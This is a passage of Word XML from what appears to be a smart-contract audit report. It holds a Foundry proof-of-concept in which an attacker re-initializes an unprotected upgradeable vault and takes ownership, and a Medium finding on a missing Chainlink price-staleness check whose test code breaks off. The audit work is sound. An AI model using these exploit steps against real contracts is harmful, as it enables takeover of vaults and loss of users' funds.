        <w:t>import {ERC1967Proxy} from "openzeppelin-contracts/contracts/proxy/ERC1967/ERC1967Proxy.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED571C0" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {MockERC20} from "../../contracts/mocks/MockERC20.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D79B8CE" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {YieldVaultUpgradeableVulnerable} from "../mocks/YieldVaultUpgradeableVulnerable.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B37972" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D46F69C" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>contract YieldVaultInitializerVulnerableTest is Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666FA399" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    function test_anyone_can_reinitialize_and_become_owner() public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4181F" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        MockERC20 asset = new MockERC20("USDC", "USDC");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E3A8C" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        YieldVaultUpgradeableVulnerable impl = new YieldVaultUpgradeableVulnerable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4598EC2B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A90943" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        bytes memory initData = abi.encodeCall(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5086F" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">            YieldVaultUpgradeableVulnerable.initialize,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B173E7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">            (asset, address(this))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B815D8" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2AF0C2" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        ERC1967Proxy proxy = new ERC1967Proxy(address(impl), initData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396334E5" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF0F6C1" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        YieldVaultUpgradeableVulnerable vault =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037217C" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">            YieldVaultUpgradeableVulnerable(address(proxy));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0C3D95" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A34510" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        assertEq(vault.owner(), address(this));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D38AC" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9411BA" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Attacker re-initializes if modifier absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D78CDFB" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        address attacker = makeAddr("attacker");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8305FA" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        vm.prank(attacker);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138921F6" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        vault.initialize(asset, attacker);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE8A18D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8A6722" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        assertEq(vault.owner(), attacker, "ownership hijacked");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A32CB7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796E8584" w14:textId="3BF72626" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C41D5" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C702AEE" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>S-03 — Missing Chainlink staleness check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA72976" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> Medium</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> contracts/oracle/ChainlinkPriceFeed.sol — latestAnswer / _validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE59ED" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCAC90" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Early adapter code forwarded latestRoundData() to consumers without checking updatedAt against a maximum staleness window. During network congestion, L2 sequencer issues, or deprecated feeds, lending liquidations and LTV checks could use arbitrarily old prices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27751DDB" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530712AE" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Under-collateralized borrows if price should have dropped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516478EC" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Unfair liquidations if price should have risen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167FDC2A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Protocol insolvency under delayed oracle updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9B0AD" w14:textId="77777777" w:rsidR="00707638" w:rsidRPr="004C355C" w:rsidRDefault="00707638" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64104518" w14:textId="77777777" w:rsidR="00707638" w:rsidRDefault="00707638" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AC79DE" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE8929" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>function test_stale_price_accepted_without_check() public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10ADA2" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint256 staleTimestamp = block.timestamp - 30 days;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1DB1E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    mockAggregator.setRound(2_000e8, staleTimestamp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA001BD" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616F8274" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Vulnerable: no revert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC9155" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    int256 price = vulnerableFeed.latestAnswer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479020A7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
